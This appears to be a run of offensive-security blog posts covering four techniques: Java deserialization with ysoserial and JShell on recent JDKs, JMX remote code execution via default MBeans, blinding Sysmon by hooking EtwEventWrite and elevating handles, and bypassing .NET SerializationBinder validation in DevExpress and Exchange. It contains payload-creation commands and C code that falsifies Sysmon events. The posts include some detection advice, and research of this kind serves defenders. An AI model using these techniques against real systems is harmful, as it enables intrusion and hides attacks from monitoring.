we've moved our tech blog to our own homepage at https://code-white.com/blog. From now on, all fresh posts will go up there. We've also copied over all the old articles, so you won't miss anything. And don't worry, the existing Blogspot posts will remain intact to keep the existing links working. But from now on, make sure to check out https://code-white.com/blog and, if you're interested, our all new public vulnerabilities list.
Java deserialization gadgets have a long history in context of vulnerability research and at least go back to the year 2015. One of the most popular tools providing a large set of different gadgets is ysoserial by Chris Frohoff. Recently, we observed increasing concerns from the community why several gadgets do not seem to work anymore with more recent versions of JDKs. In this blog post we try to summarize certain facts to reenable some capabilities which seemed to be broken. But our journey did not begin with deserialization in the first place but rather looking for alternative ways of executing Java code in recent JDK versions. In this blost post, we'll focus on OpenJDK and Oracle implementations. Defenders should therefore adjust their search patterns to these alternative code execution patterns accordingly.
ScriptEngineManager - It's Gone
Initially, our problems began on another exploitation track not related to deserialization. Often code execution payloads in Java end with a final call to java.lang.Runtime.getRuntime().exec(args), at least in a proof-of-concept exploitation phase. But as a Red Team, we always try to maintain a low profile and avoid actions that may raise suspicion like spawing new (child) processes. This is a well-known and still hot topic discussed in the context of C2 frameworks today, especially when it comes to AV/EDR evasion techniques. But this can also be applied to Java exploitation. It is a well-known fact that an attacker has the choice between different approaches to stay within the JVM to execute arbitrary Java code, with new javax.script.ScriptEngineManager().getEngineByName(engineName).eval(scriptCode) probably being the most popular one over the last years. The input code used is usually based on JavaScript being executed by the referenced ScriptEngine available, e.g. Nashorn (or Rhino).
But since Nashorn was marked as deprecated in Java 11 (JEP 335), and removed entirely in Java 15 (JEP 372), this means that a target using a JDK version >= 15 won't process JavaScript payloads anymore by default. Instead of hoping for other manually added JavaScript engines by developers for a specific target, we could make use of a "new" Java code evaluation API: JShell, a read-eval-print loop (REPL) tool that was introduced with Java 9 (JEP 222). Mainly used in combination with a command line interface (CLI) for testing Java code snippets, it allows programmatic access as well (see JShell API). This new evaluation call reads like jdk.jshell.JShell.create().eval(javaCode), executing Java code snippets (not JavaScript!). Further call variants exist, too. We found this being mentioned already in 2019 used in context of a SpEL Injection payload. This all sounded to good to be true but nevertheless some restrictions seemed to apply.
"The input should be exactly one complete snippet of source code, that is, one expression, statement, variable declaration, method declaration, class declaration, or import."
So, we started to play with some Java code snippets using the JShell API. First, we realized that it is indeed possible to use import statements within such snippets but interestingly the subsequent statements were not executed anymore. This should have been expected by reading the quote above, i.e. one would have actually been restricted to a single statement per snippet.
We also learned that it makes a huge difference between using the CLI vs. the API programmatically. The jshell CLI tool supports the listing of pre-imported packages:
I.e. a code snippet in the CLI executing Files.createFile(java.nio.file.Paths.get("/tmp/RCE")); works just fine. Calling the eval method programmatically on a JShell instance instead gives a different result, namely Files not known in this context. As a side note, eval calls do not return any exception messages printed to stdout/stderr. For "debugging" purposes, the diagnostics methods helps a lot: jshell.diagnostics(events.get(0).snippet()).forEach(x -> System.out.println(x.getMessage(Locale.ENGLISH)));.
Thus, it seems that we don't have access to a lot of "useful" classes with the programmatic approach. But as you already might have guessed, using fully qualified class names can be used as well. We don't have to "fix" the import issue mentioned above but can still use all built-in JDK classes by referencing them accordingly: java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));. This gives us again all the power needed to build (almost) arbitrary Java code payloads for exfiltrating data, putting them in a server response etc. pp.
Ysoserial - The Possible
Besides the fact, that we could now benefit from this approach to inject these kinds of payloads in various attacking scenarios, this blog post should also be about insecure deserialization exploitation. Starting with a well-known gadget CommonsCollections6, the original Runtime.getRuntime().exec(args) will be replaced with a JShell variant. Using the handy TransformerChain pattern, one simply has to replace the chain accordingly.
After a small adjustment to the pom.xml
we're ready to rebuild the ysoserial package with maven. But creating a payload with a recent version of JDK (version 17 in our case) revealed the following error.
In JDK9, the Java Platform Module System (JPMS) was introduced based on the "historical" project Jigsaw. We highly recommend the reader to look through the historical timeline with the corresponding JEPs in this IBM Java tutorial. E.g. JEP 260 describes the fact that most internal JDK APIs should be encapsulated properly such that Getters and Setters have to be used for access/change of otherwise privately declared internal member variables. Also the new Java module structure should explicitely restrict access between different modules, i.e. declaring lists of exported packages will become a "must" to allow inter-module access via the new module descriptor module-info.java. Additionally, since JDK16 the default strategy with respect to Java Reflection API is set to "deny by default" (JEP 396).
The CommonsCollections library is not implemented as Java module so that by definition it falls in the category unnamed (compare with exception message above).
Browsing through the ysoserial GitHub issue tracker, it appears people seem to have similar problems recently. One of the best articles explaining this kind of issue comes from Oracle itself. The chapter "Illegal Reflective Access" nicely summarizes the adjustments to JDK versions with respect to access of otherwise inaccessible members between packages via Java Reflection API.
"Some tools and libraries use reflection to access parts of the JDK that are meant for internal use only. This is called illegal reflective access and by default is not permitted in JDK 16 and later.
...
Code that uses reflection to access private fields of exported java.* APIs will no longer work by default.
The code will throw an InaccessibileObjectException."
Furthermore, Oracle states that
"If you need to use an internal API that has been made inaccessible, then use the --add-exports runtime option. You can also use --add-exports at compile time to access internal APIs.
If you have to allow code on the class path to do deep reflection to access nonpublic members, then use the --add-opens option."
Since CommonsCollections6 (and most of other gadgets) make heavy use of the Java Reflection API via java.lang.reflect.Field.setAccessible(boolean flag), this restriction has to be taken into account accordingly. Oracle already gave the solution above. Note that the --add-exports parameter does not allow "deep reflection", i.e. access to otherwise private members. So, creating the payload using java --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));" works just fine and gives code execution in insecure deserialization sinks again.
Ysoserial - The Impossible
Another popular gadget is CommonsBeanutils1, still frequently used in these days to gain code execution through insecure deserialization. A short side note: this gadget chain uses Gadgets.createTemplatesImpl(cmd) to put your command into a Java statement, compiled then into bytecode which is executed later. Chris Frohoff already gave a nice hint in his code that instead of the java.lang.Runtime.getRuntime().exec(cmd) call, one "[...] could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections". That's already a powerful primitive which might not have been used by too many people over the last years (at least not been made public as popular choice).
But let's get back to trying to create a payload in JDK17 which unfortunately results in a different exception compared to CommonsCollections6.
This kind of error is expected, cross-checking with the Oracle article mentioned above, and can therefore be solved with the same approach: java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "[JAVA_CODE]" (see also Chris Frohoff's comment on an issue).
You might be aware of the deserializer test class in ysoserial. This can be called by piping the payload creation result directly into java -cp ./target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.Deserializer. You should first test this with our CommonsCollections6 case above.
But what if we do this with our successfully created CommonsBeanutils1 gadget?
Sounds familiar? Unfortunately, this scenario is equivalent to server side deserialization processing, i.e. no code execution! If you add the --add-opens parameters to the ysoserial.Deserializer as well, deserialization works as expected of course but in a remote attack scenario we obviously don't have control over this!
Since org.apache.commons.beanutils.PropertyUtilsBean tries to access com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, traditional paths in gadget chains like TemplatesImpl turned out to be useless in most cases. This, again, is because third-party libraries known from ysoserial are not Java modules and the module system strongly protects internal JDK classes. If we check the module-info.java in JDKs java.xml/share/classes/ directory, no exports can be found matching these package names needed. Game over.
Conclusions
Use JShell instead of ScriptEngineManager for JDK versions >= 15 (side note: this is not available in JREs!). This is also relevant for Defenders searching for code execution patterns only based on Runtime.getRuntime().exec or ScriptEngineManager().getEngineByName(engineName).eval calls. Keep in mind, this already affects JDK versions >= 9.
For JDK versions < 16, use the --add-opens property Setters during payload creation.
For JDK versions >= 16, rely on known (or find new) Java deserialization gadgets which do not depend on access to internal JDK class members etc. However, check for the exported namespaces before giving up a certain gadget chain.
The Java Management Extensions (JMX) are used by many if not all enterprise level applications in Java for managing and monitoring of application settings and metrics. While exploiting an accessible JMX endpoint is well known and there are several free tools available, this blog post will present new insights and a novel exploitation technique that allows for instant Remote Code Execution with no further requirements, such as outgoing connections or the existence of application specific MBeans.
Introduction
How to exploit remote JMX services is well known. For instance, Attacking RMI based JMX services by Hans-Martin Münch gives a pretty good introduction to JMX as well as a historical overview of attacks against exposed JMX services. You may want to read it before proceeding so that we're on the same page.
And then there are also JMX exploitation tools such as mjet (formerly also known as sjet, also by Hans-Martin Münch) and beanshooter by my colleague Tobias Neitzel, which both can be used to exploit known vulnerabilities and JMX services and MBeans.
However, some aspects are either no longer possible in current Java versions (e. g., pre-authenticated arbitrary Java deserialization via RMIServer.newClient(Object)) or they require certain MBeans being present or conditions such as the server being able to connect back to the attacker (e. g., MLet with HTTP URL).
In this blog post we will look into two other default MBean classes that can be leveraged for pretty unexpected behavior:
remote invocation of arbitrary instance methods on arbitrary serializable objects
remote invocation of arbitrary static methods on arbitrary classes
Tobias has implemented some of the gained insights into his tool beanshooter. Thanks!
Read The Fine Manual
By default, MBean classes are required to fulfill one of the following:
follow certain design patterns
implement certain interfaces
For example, the javax.management.loading.MLet class implements the javax.management.loading.MLetMBean, which fulfills the first requirement that it implements an interface whose name of the same name but ends with MBean.
The two specific MBean classes we will be looking at fulfill the second requirement:
Both classes provide features that don't seem to have gotten much attention yet, but are pretty powerful and allow interaction with the MBean server and MBeans that may even violate the JMX specification.
The Standard MBean Class StandardMBean
The StandardMBean was added to JMX 1.2 with the following description:
[…] the javax.management.StandardMBean class can be used to define standard MBeans with an interface whose name is not necessarily related to the class name of the MBean.
Here reflection is used to determine the attributes and operations based on the given interface class and the JavaBeans™ conventions.
That basically means that we can create MBeans of arbitrary classes and call methods on it that are defined by the interfaces they implement. The only restriction is that the class needs to be Serializable as well as any possible arguments we want to use in the method call.
public final class TemplatesImpl implements Templates, Serializable
Meet the infamous TemplatesImpl! It is an old acquaintance common in Java deserialization gadgets as it is serializable and calling any of the following public methods results in loading of a class from byte code embedded in the private field _bytecodes:
TemplatesImpl.getOutputProperties()
TemplatesImpl.getTransletIndex()
TemplatesImpl.newTransformer()
The first and last methods are actually defined in the javax.xml.transform.Templates interface that TemplatesImpl implements. The getOutputProperties() method also fulfills the requirements for a MBean attribute getter method, which makes it a perfect trigger for serializers calling getter methods during the process of deserialization.
In this case it means that we can call these Templates interface methods remotely and thereby achieve arbitrary Remote Code Execution in the JMX service process:
Here we even have the choice to either read the attribute OutputProperties (resulting in an invocation of getOutputProperties()) or to invoke getOutputProperties() or newTransformer() directly.
The Model MBean Class RequiredModelMBean
The javax.management.modelmbean.RequiredModelMBean is already part of JMX since 1.0 and is even more versatile than the StandardMBean:
This model MBean implementation is intended to provide ease of use and extensive default management behavior for the instrumentation.
– Java™ Management Extensions Instrumentation and Agent Specification, v1.0
Also:
Java resources wishing to be manageable instantiate the RequiredModelMBean using the MBeanServer's createMBean method. The resource then sets the MBeanInfo and Descriptors for the RequiredModelMBean instance. The attributes and operations exposed via the ModelMBeanInfo for the ModelMBean are accessible from MBeans, connectors/adaptors like other MBeans. […]
So instead of having the wrapping MBean class use reflection to retrieve the MBean information from the interface class, a RequiredModelMBean allows to specify the set of attributes, operations, etc. by providing a ModelMBeanInfo with corresponding ModelMBeanAttributeInfo, ModelMBeanOperationInfo, etc.
That means, we can define what public instance attribute getters, setters, or regular methods we want to be invokable remotely.
Invoking Arbitrary Instance Methods
We can even define methods that do not fulfill the JavaBeans™ convention or MBeans design patterns like this example with java.io.File demonstrates:
This works with every serializable object and public instance method. Arguments also need to be serializable. Return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.
Invoking Arbitrary Static Methods
While working on the implementation of some of the insights described here into beanshooter, Tobias pointed out that it is also possible to invoke static methods on arbitrary classes.
At first I was baffled because when reading the implementation of RequiredModelMBean.invoke(String, Object[], String[]), there is no way to have targetObject being null. And my assumption was that for calling static methods, the object instance provided as first argument to Method.invoke(Object, Object...) must be null. However, I figured that my assumption was entirely wrong after reading the manual:
If the underlying method is static, then the specified obj argument is ignored. It may be null.
Furthermore, it is not even required that the method is declared in a serializable class but any static method of any class can be specified! Awesome finding, Tobias!
So, for calling static methods, an additional Descriptor instance needs to be provided to the ModelMBeanOperationInfo constructor which holds a class field with the targeted class name.
The provided class field is read in RequiredModelMBean.invoke(String, Object[], String[]) and overrides the target class variable, which otherwise would be obtained by calling getClass() on the resource object.
So, for instance, for creating a ModelMBeanOperationInfo for System.setProperty(String, String), the following can be used:
As already said, for calling the static method, the resource managed by RequiredModelMBean can be any arbitrary serializable instance. So even a String suffices.
This works with any public static method regardless of the class it is declared in. But again, provided argument values still need to be serializable. And return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.
Conclusion
Even though exploitation of JMX is generally well understood and comprehensively researched, apparently no one had looked into the aspects described here.
So check your assumptions! Don't take things for granted, even when it seems everyone has already looked into it. Dive deep to understand it fully. You might be surprised.
In this blogpost we demonstrate an attack on the integrity of Sysmon which generates a minimal amount of observable events making this attack difficult to detect in environments where no additional security products are installed.
tl;dr:
Suspend all threads of Sysmon.
Create a limited handle to Sysmon and elevate it by duplication.
Clone the pseudo handle of Sysmon to itself in order to bypass SACL as proposed by James Forshaw.
Inject a hook manipulating all events (in particular ProcessAccess events on Sysmon).
At Code White we are used to performing complex attacks against hardened and strictly monitored environments. A reasonable approach to stay under the radar of the blue team is to blend in with false positives by adapting normal process- and user behavior, carefully choosing host processes for injected tools and targeting specific user accounts.
However, clients with whom we have been working for a while have reached a high level of maturity. Their security teams strictly follow all the hardening advice we give them and invest a lot of time in collecting and base-lining security related logs while constantly developing and adapting detection rules.
We often see clients making heavy use of Sysmon, along with the Windows Event Logs and a traditional AV solution. For them, Sysmon is the root of trust for their security monitoring and its integrity must be ensured. However, an attacker who has successfully and covertly attacked, compromised the integrity of Sysmon and effectively breaks the security model of these clients.
In order to undermine the aforementioned security-setup, we aimed at attacking Sysmon to tamper with events in a manner which is difficult to detect using Sysmon itself or the Windows Event Logs.
Attacks on Sysmon and Detection
Having done some Googling on how to blind Sysmon, we realized that all publicly documented ways are detectable via Sysmon itself or the Windows Event Logs (at least those we found) :
Unloading Sysmon Driver - Detectable via Sysmon event id 255, Windows Security Event ID 4672.
While we were confident that we can kill Sysmon before throwing Event ID 5 (Process terminated) we thought that a host not sending any events would be suspicious and could be observed in a client's SIEM. Also, loading a signed, whitelisted and exploitable driver to attack from Kernel land was out of scope to maintain stability.
Since all of these documented attack vectors are somehow detectable via Sysmon itself, the Windows Event Logs or can cause stability issues we needed a new attack vector with the following capabilities:
Not detectable via Sysmon itself
Not detectable via Windows Event Log
Sysmon must stay alive
Attack from usermode
Injecting and manipulating the control flow of Sysmon seemed the most promising.
Attack Description
Similarly to SysmonQuiet or EvtMute, the idea is to inject code into Sysmon which redirects the execution flow in such a way that events can be manipulated before being forwarded to the SIEM.
However, the attack must work in such a way that corresponding ProcessAccess events on Sysmon are not observable via Sysmon or the Event Log.
This presents various problems, but let us first see where such a hook would be applicable.
Manipulating the Execution Flow
Sysmon forwards events to ETW subscribers via the documented function ntdll!EtwEventWrite. This is easily observable by setting an appropriate breakpoint.
The Id field of the EVENT_DESCRIPTOR determines the type of event and is important to apply the correct struct definition for the event data pointed to by PEVENT_DATA_DESCRIPTOR.
The structs for the different events are obviously different for each Sysmon Event Id, as different fields and information are included.
Our injected code must thus be able to apply the correct struct depending on which event is being emitted by Sysmon.
But how do we know the definition of the event structs? Luckily, ETW Explorer has already documented the event definitions:
A definition for the userdata struct describing a ProcessAccess event might therefore look as follows:
We can validate this in x64dbg by setting a breakpoint at ntdll!EtwEventWrite and applying the said struct definition for a ProcessAccess event.
Faking events
ntdll!EtwEventWrite being responsible for forwarding events is a good place to install a hook to redirect the control flow to injected code which first manipulates the event and then forwards it:
The injected code manipulating the events might look like this:
//Hooked EtwEventWrite FunctionULONG Hook_EtwEventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData){
//Get the address of the EtwEventWriteFull Function
_EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)getFunctionPtr(CRYPTED_HASH_NTDLL, CRYPTED_HASH_ETWEVENTWRITEFULL);
if (EtwEventWriteFull == NULL) {
gotoexit;
}
//Check if it is a process access event and needs to be tampered withswitch (EventDescriptor->Id) {
case EVENT_PROCESSACCESS:
HandleProcessAccess((PProcessAccess)UserData);
break;
default:
break;
}
//Save the event with the EtwEventWriteFull Function
EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
exit:
return0;
}
// Make ProcessAccess events targeting Sysmon itself look benignVOID HandleProcessAccess(PProcessAccess pProcessAccess){
ACCESS_MASK access_mask_benign = 0x1400;
PCWSTR wstr_sysmon = L"Sysmon";
PCWSTR wstr_ente = L"Ente";
//Sysmon check
psysmon = StrStrIW(pProcessAccess->ptargetimage, wstr_sysmon);
if (psysmon != NULL) {
//Replace the access mask with 0x1400
*pProcessAccess->pGrantedAccess = access_mask_benign;
pProcessAccess->sizeGrantedAccess = sizeof(access_mask_benign);
//Replace the Source User with Ente
lstrcpyW(pProcessAccess->pSourceUser, wstr_ente);
pProcessAccess->sizeSourceUser = sizeof(wstr_ente);
}
}
Note, how ntdll!EtwEventWriteFull is used to forward every event.
Since we know where to inject the hook and what the UserData structs look like, we are now able to tamper with every Sysmon event before it is forwarded.
However, the injection into Sysmon remains observable and the corresponding ProcessAccess event is the last event we do not control.
Detection of Process Manipulation
OpenProcess Access event
In order to create a handle to Sysmon which allows us to conduct process injection of any kind, we need to open Sysmon with at least the following access mask: PROCESS_VM_OPERATION | PROCESS_VM_WRITE. As Sysmon has not yet been modified while we open this handle, a suspicious ProcessAccess Event is generated which is an IOC defenders could hunt for:
Handle Elevation
Playing with kernel32!DuplicateHandle for another project, we noticed that MSDN states something very interesting:
In some cases, the new handle can have more access rights than the original handle.
Thus, by first creating a handle with a very limited access mask and then duplicating this handle with a new access mask, we technically do not create a new handle with a high access mask.
Sysmon, (to the best of our knowledge) only using OB_OPERATION_HANDLE_CREATE, only sees the benign access mask, but not the duplication of the handle with a higher access mask:
Using handle elevation we can gain handles with arbitrary process access masks to arbitrary (non-ppl) processes while Sysmon only logs the instantiation of the original handle. Great Success!
Unfortunately, there are some problems:
This only works if the targeted process runs as the same user as the duplicating process.
This can be easily circumvented by stealing a token from a System process.
We steal the token from an elevated svchost process running as System by only using a PROCESS_QUERY_LIMITED_INFORMATION mask, where we do not need the SE_DEBUG privilege which is often used in detection rules.
System Access Control Lists (SACL).
This is a bigger problem
Detection via System Access Control Lists (SACL)
Unfortunately, it is still possible to observe the duplication of the handle by configuring Object Access Auditing using a SACL on Sysmon. The following screenshot shows how ProcessHacker is leveraged to configure the SACL:
With this SACL, event 4656 is generated by the Windows Event Log Service upon creation of a handle to Sysmon allowing to write in its memory. This event is also emitted, if handle elevation is used.
Note: In the default config, Object Access Auditing is not enabled.
According to the post, we can duplicate the pseudo handle of a different process to itself to get full access to the process without triggering Object Access Auditing.
A stealthy way to gain a handle suitable for process injection would be the following:
Open a process handle to Sysmon with a very limited access mask (A detection rule based on this would generate too many false positives)
Elevate this handle using ntdll!DuplicateObject to hold the PROCESS_DUP_HANDLE right (Bypasses Sysmon's telemetry)
Use the elevated handle to duplicate the pseudo Handle of Sysmon (Bypasses SACL).
uPid.UniqueProcess = dwPid;
uPid.UniqueThread = 0;
ntStatus = NtOpenProcess(&hlowpriv, PROCESS_QUERY_LIMITED_INFORMATION, &ObjectAttributes, &uPid);
if (!NT_SUCCESS(ntStatus))
FATAL("[-] Failed to open low priv handle to sysmon\n");
ntStatus = NtDuplicateObject(NtCurrentProcess(), hlowpriv, NtCurrentProcess(), &hduppriv, PROCESS_DUP_HANDLE, FALSE, 0);
if (!NT_SUCCESS(ntStatus))
FATAL("[-] Failed to elevate to handle with PROCESS_DUP_HANDLE rights\n");
ntStatus = NtDuplicateObject(hduppriv, NtCurrentProcess(), NtCurrentProcess(), &hhighpriv, PROCESS_ALL_ACCESS, FALSE, 0);
if (!NT_SUCCESS(ntStatus))
FATAL("[-] Failed to elevate to handle with PROCESS_ALL_ACCESS rights\n");
Doing so we gain a full access handle to Sysmon while bypassing Sysmon's telemetry and SACL.
Fine Tuning
There was one last IOC we could come up with. Sysmon can only observe the creation of a limited handle to itself, however, following the golden rule of never touching disk, our tool being unpacked or injected into another process will have a broken calltrace containing unknown sections. Since Sysmon has not been tampered with at this point, this would be the last event which we do not have under control and might be sufficient to create a detection rule upon!
We can delay the forwarding of this event by suspending all threads of Sysmon. The events are then queued and dispatched only after we resume the threads, giving us enough time to install a hook manipulating all ProcessAccess events on Sysmon itself. This is possible, because no events for accessing, suspending or resuming a thread exist in Sysmon.
The hook then necessarily spoofs the callstack included in the ProcessAccess event.
Putting It All Together
We combined all of these steps into a tool we call SysmonEnte which you can find on our Github.
SysmonEnte is implemented as fully position independent code (PIC) which can be called using the following prototype:
DWORD go(DWORD dwPidSysmon);
A sample loader is included and built during compilation when typing make.
Additionally, SysmonEnte uses indirect syscalls to bypass userland hooks while injecting into Sysmon.
The open source variant tampers with process access events to Lsass and Sysmon and sets the access mask to a benign one. Additionally, the source user and the callstack is set to Ente. You can change these to your needs.
Possible Detection Methods
Certain detection ideas exist from our point of view:
ETW TI
The easiest solution would be to subscribe to the Threat Intelligence ETW provider to observe injections or suspicious code manipulations. This however requires a signed ELAM driver.
If you have the possibility to enable Object Access Auditing, you can configure a SACL for Sysmon to monitor the duplication of handles to catch the SACL bypass used to gain a handle to Sysmon. We are not sure about false positives in large environments though.
To the best of our knowledge, and in contrast to SACLs for filesystem- or registry operations, configuring Object Access Auditing on processes is only achievable by writing a custom program. This circumstance makes the detection of handle duplication via SACL non-trivial.
A sample program is included on our Github and configures a SACL with ACCESS_SYSTEM_SECURITY + PROCESS_DUP_HANDLE + PROCESS_VM_OPERATION and is applied to the group Everyone. ACCESS_SYSTEM_SECURITY is included as otherwise, attackers can covertly change the SACL.
With this configuration, attempts to duplicate a handle to Sysmon should become visible.
Note: Object Access Auditing is not enabled by default and must be enabled via Group Policy prior the use of the tool.
Final Words
Sysmon on it's own is not able to protect itself sufficiently, and it is difficult to observe the described attack with the event log.
We believe that running Sysmon alone, without any protection from a trusted third party tool sitting in kernel land or running as a PPL, is not guaranteed to produce reliable logs with ensured integrity. A possible fix by Microsoft would be to allow running Sysmon as a PPL.
It is noteworthy that the described technique of handle elevation + SACL bypass can also be used to stealthily dump Lsass.
After our talk at X33fcon, nanodump supports handle elevation as well.
However, a SACL with PROCESS_VM_READ is configured for Lsass by default. ;-)
Serialization binders are often used to validate types specified in the serialized data to prevent the deserialization of dangerous types that can have malicious side effects with the runtime serializers such as the BinaryFormatter.
In this blog post we'll have a look into cases where this can fail and consequently may allow to bypass validation. We'll also walk though two real-world examples of insecure serialization binders in the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277), that both allow remote code execution.
Introduction
Type Names
Type names are used to identify .NET types. In the fully qualified form (also known as assembly qualified name, AQN), it also contains the information on the assembly the type should be loaded from. This information comprises of the assembly's name as well as attributes specifying its version, culture, and a token of the public key it was signed with. Here is an (extensive) example of such an assembly qualified name:
This assembly qualified name comprises of two parts with several components:
Assembly Qualified Name (AQN)
Type Full Name
Namespace
Type Name
Generic Type Parameters Indicator
Nested Type Name
Generic Type Parameters
Embedded Type AQN (EAQN)
Assembly Full Name
Assembly Name
Assembly Attributes
You can see that the same breakdown can also be applied to the embedded type's AQN. For simplicity, the type info will be referred to as type name and the assembly info will be referred to as assembly name as these are the general terms used by .NET and thus also within this post.
The assembly and type information are used by the runtime to locate and bind the assembly. That software component is also sometimes referred to as the CLR Binder.
Serialization Binders
In its original intent, a SerializationBinder was supposed to work just like the runtime binder but only in the context of serialization/deserialization with the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:
Some users need to control which class to load, either because the class has moved between assemblies or a different version of the class is required on the server and client. — SerializationBinder Class
For that, a SerializationBinder provides two methods:
public virtual void BindToName(Type serializedType, out string assemblyName, out string typeName);
public abstract Type BindToType(string assemblyName, string typeName);
The BindToName gets called during serialization and allows to control the assemblyName and typeName values that get written to the serialized stream. On the other side, the BindToType gets called during deserialization and allows to control the Type being returned depending on the passed assemblyName and typeName that were read from the serialized stream. As the latter method is abstract, derived classes would need provide their own implementation of that method.
That is probably why developers (mis-)use them as a security measure to prevent the deserialization of malicious types. And it is still widely used, even though those serializers have already been disapproved for obvious reasons.
But using a SerializationBinder for validating the type to be deserialized can be tricky and has pitfalls that may allow to bypass the validation depending on how it is implemented.
What could possibly go wrong?
For validating the specified type, developers can either
work solely on the string representations of the specified assembly name and type name, or
try to resolve the specified type and then work with the returned Type.
Each of these strategies has its own advantages and disadvantages.
Advantages/Disadvantages of Validation Before/After Type Binding
On the other hand, however, the type name parsing is not that straight forward and the internal type parser/binder of .NET allows some unexpected quirks:
whitespace characters (i. e., U+0009, U+000A, U+000D, U+0020) are generally ignored between tokens, in some cases even further characters
type names can begin with a "." (period), e. g., .System.Data.DataSet
assembly names are case-insensitive and can be quoted, e. g., MsCoRlIb and "mscorlib"
assembly attribute values can be quoted, even improperly, e. g., PublicKeyToken="b77a5c561934e089" and PublicKeyToken='b77a5c561934e089
.NET Framework assemblies often only require the PublicKey/PublicKeyToken attribute, e. g., System.Data.DataSet, System.Data, PublicKey=00000000000000000400000000000000 or System.Data.DataSet, System.Data, PublicKeyToken=b77a5c561934e089
assembly attributes can be in arbitrary order, e. g., System.Data, PublicKeyToken=b77a5c561934e089, Culture=neutral, Version=4.0.0.0
arbitrary additional assembly attributes are allowed, e. g., System.Data, Foo=bar, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, Baz=quux
assembly attributes can consist of almost arbitrary data (supported escape sequences: \", \', \,, \/, \=, \\, \n, \r, and \t)
This renders detecting known dangerous types based on their name basically impractical, which, by the way, is always a bad idea. Instead, only known safe types should be allowed and anything else should result in an exception being thrown.
In contrast to that, resolving the type before validation would allow to work with a normalized form of the type. But type resolution/binding may also fail. And depending on how the custom SerializationBinder handles such cases, it can allow attackers to bypass validation.
SerializationBinder Usages
If you keep in mind that the SerializationBinder was supposedly never meant to be used as a security measure (otherwise it would probably have been named SerializationValidator or similar), it gets more clear if you see how it is actually used by the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:
Here, if the BinaryFormatter uses FormatterAssemblyStyle.Simple (i. e., bSimpleAssembly == true, which is the default for BinaryFormatter), then the specified assembly name is used to create an AssemblyName instance and it is then attempted to load the corresponding assembly with it. This must succeed, otherwise ObjectReader.FastBindToType(string, string) immediately returns with null. It is then tried to load the specified type with ObjectReader.GetSimplyNamedTypeFromAssembly(Assembly, string, ref Type).
This method first calls FormatterServices.GetTypeFromAssembly(Assembly, string) that tries to load the type from the already resolved assembly using Assembly.GetType(string) (not depicted here). But if that fails, it uses Type.GetType(string, Func<AssemblyName, Assembly>, Func<Assembly, string, bool, Type>, bool) with the specified type name as first parameter. Now if the specified type name happens to be a AQN, the type loading succeeds and it returns the type specified by the AQN regardless of the already loaded assembly.
That means, unless the custom SerializationBinder.BindToType(string, string) implementation uses the same algorithm as the ObjectReader.FastBindToType(string, string) method, it might be possible to get the custom SerializationBinder to fail while the ObjectReader.FastBindToType(string, string) still succeeds. And if the custom SerializationBinder.BindToType(string, string) method does not throw an exception on failure but silently returns null instead, it would also allow to bypass any type validation implemented in SerializationBinder.BindToType(string, string).
There is also another and probably more convenient way to specify an arbitrary assembly name and type name by using a custom SerializationBinder during serialization:
class CustomSerializationBinder : SerializationBinder
{
public override void BindToName(Type serializedType, out string assemblyName, out string typeName)
{
assemblyName = "…";
typeName = "…";
}
public override Type BindToType(string assemblyName, string typeName)
{
throw new NotImplementedException();
}
}
This allows to fiddle with all assembly names and type names that are used within the object graph to be serialized.
Common Pitfalls of Custom SerializationBinders
There are two common pitfalls that can render a SerializationBinder bypassable:
parsing the passed assembly name and type name differently than the .NET runtime does
resolving the specified type differently than the .NET runtime does
We will demonstrate these with two case studies: the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277).
Case Study № 1: SafeSerializationBinder in DevExpress (CVE-2022-28684)
Despite its name, the DevExpress.Data.Internal.SafeSerializationBinder class of DevExpress.Data is not really a SerializationBinder. But its Ensure(string, string) method is used by the DXSerializationBinder.BindToType(string, string) method to check for safe and unsafe types.
It does this by checking the assembly name and type name against a list of known unsafe types (i. e., UnsafeTypes class) and known safe types (i. e., KnownTypes class). To pass the validation, the former must not match while the latter must match as both XtraSerializationSecurityTrace.UnsafeType(string, string) and XtraSerializationSecurityTrace.NotTrustedType(string, string) result in an exception being thrown.
The check in each Match(string, string) method comprises of a match against so called type ranges and several full type names.
A type range is basically a pair of assembly name and namespace prefix that the passed assembly name and type name are tested against.
Here is the definition of UnsafeTypes.typeRanges that UnsafeTypes.Match(string, string) tests against:
And here UnsafeTypes.types:
This set basically comprises the types used in public gadgets such as those of YSoSerial.Net.
Remember that SafeSerializationBinder.Ensure(string, string) does not resolve the specified type but only works on the assembly names and type names read from the serialized stream. The type binding/resolution attempt happens after the string-based validation in DXSerializationBinder.BindToType(string, string) where Assembly.GetType(string, bool) is used to load the specified type from the specified assembly but without throwing an exception on error (i. e., the passed false).
We'll demonstrate how a System.Data.DataSet can be used to bypass validation in SafeSerializationBinder.Ensure(string, string) despite it is contained in UnsafeTypes.types.
As DXSerializationBinder.BindToType(string, string) can return null in two cases (assembly == null or Assembly.GetType(string, bool) returns null), it is possible to craft the assembly name and type name pair that does fail loading while the fallback ObjectReader.FastBindToType(string, string) still returns the proper type.
